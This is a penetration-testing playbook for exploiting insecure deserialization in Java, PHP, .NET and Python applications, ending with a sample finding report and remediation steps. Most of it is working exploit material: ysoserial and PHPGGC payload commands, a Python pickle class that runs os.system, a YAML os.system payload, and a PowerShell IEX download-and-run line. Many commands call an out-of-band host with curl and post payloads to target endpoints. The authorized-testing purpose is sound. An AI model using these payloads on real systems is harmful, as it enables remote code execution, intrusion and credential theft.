| name | exploiting-insecure-deserialization |
| description | Identifying and exploiting insecure deserialization vulnerabilities in Java, PHP, Python, and .NET applications to achieve remote code execution during authorized penetration tests. |
| domain | cybersecurity |
| subdomain | web-application-security |
| tags | ["penetration-testing","deserialization","rce","owasp","web-security","ysoserial"] |
| version | 1.0 |
| author | mahipal |
| license | Apache-2.0 |
Exploiting Insecure Deserialization
When to Use
- During authorized penetration tests when applications process serialized data (cookies, API parameters, message queues)
- When identifying Java serialization markers (
ac ed 00 05 / rO0AB) in HTTP traffic
- For testing PHP applications that use
unserialize() on user-controlled input
- When evaluating .NET applications using
BinaryFormatter, ObjectStateFormatter, or ViewState
- During security assessments of applications using pickle (Python), Marshal (Ruby), or YAML deserialization
Prerequisites
- Authorization: Written penetration testing agreement with RCE testing scope
- ysoserial: Java deserialization exploit tool (
git clone https://github.com/frohoff/ysoserial.git)
- ysoserial.net: .NET deserialization exploit tool (
git clone https://github.com/pwntester/ysoserial.net.git)
- PHPGGC: PHP deserialization gadget chain generator (
git clone https://github.com/ambionics/phpggc.git)
- Burp Suite Professional: With Java Deserialization Scanner extension
- Java Runtime: For running ysoserial
- Collaborator/interactsh: For out-of-band confirmation of code execution
Workflow
Step 1: Identify Serialized Data in Application Traffic
Detect serialized objects in HTTP parameters, cookies, and headers.
echo "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA..." | base64 -d | xxd | head
Step 2: Test Java Deserialization with ysoserial
Generate deserialization payloads for Java applications.
java -jar ysoserial.jar 2>&1 | grep -E "^\s+\w"
java -jar ysoserial.jar URLDNS "http://java-deser.abc123.oast.fun" | base64 -w0
java -jar ysoserial.jar CommonsCollections1 "curl http://abc123.oast.fun/rce" | base64 -w0
java -jar ysoserial.jar CommonsCollections5 "whoami" | base64 -w0
java -jar ysoserial.jar CommonsCollections6 "id" | base64 -w0
java -jar ysoserial.jar Spring1 "curl http://abc123.oast.fun/spring" | base64 -w0
java -jar ysoserial.jar Hibernate1 "curl http://abc123.oast.fun/hibernate" | base64 -w0
PAYLOAD=$(java -jar ysoserial.jar CommonsCollections5 "curl http://abc123.oast.fun/confirm" | base64 -w0)
curl -s -X POST \
-b "session=$PAYLOAD" \
"https://target.example.com/dashboard"
Step 3: Test PHP Deserialization with PHPGGC
Generate PHP gadget chains for common frameworks.
./phpggc -l
./phpggc Laravel/RCE1 system "id" -b
./phpggc Laravel/RCE5 system "whoami" -b
./phpggc Symfony/RCE4 exec "curl http://abc123.oast.fun/php-rce" -b
./phpggc Guzzle/RCE1 system "id" -b
./phpggc Monolog/RCE1 system "id" -b
PAYLOAD=$(./phpggc Laravel/RCE1 system "curl http://abc123.oast.fun/laravel" -b)
curl -s -b "serialized_data=$PAYLOAD" \
"https://target.example.com/dashboard"
Step 4: Test .NET Deserialization
Assess ViewState and other .NET serialization vectors.
./ysoserial.exe -g TypeConfuseDelegate -f ObjectStateFormatter \
-c "curl http://abc123.oast.fun/dotnet-rce" -o base64
./ysoserial.exe -g TextFormattingRunProperties -f BinaryFormatter \
-c "whoami" -o base64
./ysoserial.exe -g ActivitySurrogateSelector -f ObjectStateFormatter \
-c "powershell -c IEX(curl http://abc123.oast.fun/ps)" -o base64
curl -s "https://target.example.com/remoting/service.rem"
Step 5: Test Python Pickle Deserialization
Exploit pickle-based deserialization in Python applications.
import pickle
import base64
import os
class Exploit:
def __reduce__(self):
return (os.system, ('curl http://abc123.oast.fun/pickle-rce',))
payload = base64.b64encode(pickle.dumps(Exploit())).decode()
print(f"Pickle payload: {payload}")
import pickletools
pickletools.dis(pickle.dumps(Exploit()))
PAYLOAD=$(python3 -c "
import pickle, base64, os
class E:
def __reduce__(self):
return (os.system, ('curl http://abc123.oast.fun/pickle',))
print(base64.b64encode(pickle.dumps(E())).decode())
")
curl -s -X POST \
-H "Content-Type: application/octet-stream" \
-d "$PAYLOAD" \
"https://target.example.com/api/import"
curl -s -X POST \
-H "Content-Type: application/x-yaml" \
-d "!!python/object/apply:os.system ['curl http://abc123.oast.fun/yaml']" \
"https://target.example.com/api/config"
Step 6: Confirm Exploitation and Document Impact
Validate successful deserialization attacks and document the impact chain.
java -jar ysoserial.jar CommonsCollections5 "sleep 10" | base64 -w0
java -jar ysoserial.jar CommonsCollections5 \
"curl http://abc123.oast.fun/\$(whoami)" | base64 -w0
Key Concepts
| Concept | Description |
|---|
| Serialization | Converting an object into a byte stream for storage or transmission |
| Deserialization | Reconstructing an object from a byte stream, potentially executing code |
| Gadget Chain | A sequence of existing class methods chained together to achieve arbitrary code execution |
| Magic Methods | Special methods called automatically during deserialization (__wakeup, __destruct in PHP, readObject in Java) |
| ViewState | ASP.NET mechanism for persisting page state, often containing serialized objects |
| Pickle | Python's native serialization format, inherently unsafe for untrusted data |
| URLDNS Gadget | A Java gadget that triggers DNS lookup, useful for safe deserialization detection |
Tools & Systems
| Tool | Purpose |
|---|
| ysoserial | Java deserialization payload generator with multiple gadget chains |
| ysoserial.net | .NET deserialization payload generator |
| PHPGGC | PHP Generic Gadget Chains for multiple frameworks |
| Burp Java Deserialization Scanner | Automated detection of Java deserialization vulnerabilities |
| marshalsec | Java unmarshaller exploitation for various libraries |
| Freddy (Burp Extension) | Detects deserialization issues in multiple languages |
Common Scenarios
Scenario 1: Java Session Cookie RCE
A Java application stores session data as serialized objects in cookies. The rO0AB prefix reveals Java serialization. Using ysoserial with CommonsCollections gadget chain achieves remote code execution.
Scenario 2: PHP Laravel Unserialize
A Laravel application passes serialized data through a hidden form field. Using PHPGGC to generate a Laravel RCE gadget chain achieves command execution when the form is submitted.
Scenario 3: .NET ViewState Without MAC
An ASP.NET application has ViewState MAC validation disabled. Using ysoserial.net to generate a malicious ViewState payload achieves code execution when the page processes the modified ViewState.
Scenario 4: Python Pickle in Redis Cache
A Python web application stores pickled objects in Redis for caching. By poisoning the cache with a malicious pickle payload, code execution is triggered when the application deserializes the cached object.
Output Format
## Insecure Deserialization Finding
**Vulnerability**: Insecure Deserialization - Remote Code Execution
**Severity**: Critical (CVSS 9.8)
**Location**: Cookie `user_session` (Java serialized object)
**OWASP Category**: A08:2021 - Software and Data Integrity Failures
### Reproduction Steps
1. Capture the `user_session` cookie value (starts with rO0AB)
2. Generate payload: java -jar ysoserial.jar CommonsCollections5 "id"
3. Base64 encode and replace the cookie value
4. Send request; command executes on the server
### Vulnerable Library
- commons-collections 3.2.1 (CVE-2015-7501)
- Java Runtime: OpenJDK 11.0.15
### Confirmed Impact
- Remote Code Execution as `tomcat` user
- Server OS: Ubuntu 22.04 LTS
- Internal network access confirmed via reverse shell
- Database credentials accessible from application config
### Recommendation
1. Avoid deserializing untrusted data; use JSON or Protocol Buffers instead
2. Upgrade commons-collections to 4.1+ (patched version)
3. Implement deserialization filters (JEP 290 for Java 9+)
4. Use allowlists for permitted classes during deserialization
5. Implement integrity checks (HMAC) on serialized data before deserialization
